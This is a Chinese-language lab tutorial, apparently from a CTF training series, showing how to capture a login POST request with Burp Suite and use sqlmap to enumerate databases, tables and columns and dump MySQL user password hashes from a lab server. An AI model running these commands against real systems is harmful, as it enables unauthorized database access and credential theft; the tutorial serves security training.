利用sqlmap进行POST注入

目录

  • 预备知识
    • 了解Sqlmap
    • POST注入形成的原因
  • 实验目的
  • 实验环境
  • 实验步骤一
    • 使用sqlmap进行POST注入
  • 实验步骤二

预备知识

了解Sqlmap

sqlmap是一款开源、功能强大的自动化SQL注入工具,支持Access,MySQL,Oracle,SQL Server,DB2等多种数据库。支持get,post,cookie注入,支持基于布尔的盲注,基于时间的盲注,错误回显注入,联合查询注入,堆查询注入等。

POST注入形成的原因

POST注入也属于SQL注入,所以究其原因还是由于参数没有过滤导致的。源码如下:
利用sqlmap进行POST注入_第1张图片

实验目的

通过该实验熟悉sqlmap常用的命令,完成POST注入攻击。

实验环境

利用sqlmap进行POST注入_第2张图片
服务器:CentOS,IP地址:10.1.1.136
测试者:win7,IP地址随机

实验步骤一

使用sqlmap进行POST注入

1.打开http://10.1.1.136,输入用户名:admin,密码:password,登录:
利用sqlmap进行POST注入_第3张图片
2.选择Brute Force选项,username和password随便输入(此处我输入admin和123456),然后打开burpsuite,设置好本地代理(忘记的同学可看实验一),进行抓包:
利用sqlmap进行POST注入_第4张图片
利用sqlmap进行POST注入_第5张图片
3.将抓到的包保存为1.txt,并放到c盘根目录下。
列数据库,输入命令:

sqlmap.py -r c:\1.txt -p username --dbs

注:-r表示加载一个文件,-p指定参数。
利用sqlmap进行POST注入_第6张图片

实验步骤二

4.选择一个数据库,比如选mysql,猜表,输入命令:

sqlmap.py -r c:\1.txt-p username -D mysql --tables

利用sqlmap进行POST注入_第7张图片
5.猜列,输入命令:

sqlmap.py -r c:\1.txt-p username -D mysql -T user --columns

利用sqlmap进行POST注入_第8张图片
6.猜数据,输入命令:

sqlmap.py -r c:\1.txt -p username -D mysql -T user -C “User,Password” --dump

利用sqlmap进行POST注入_第9张图片
7.此时就得到了root用户的密码哈希值,接下来解密就行。

你可能感兴趣的:(CTF特训营:技术详解,解题方法与竞赛技巧,#,CTF之Web,安全,web安全,mysql)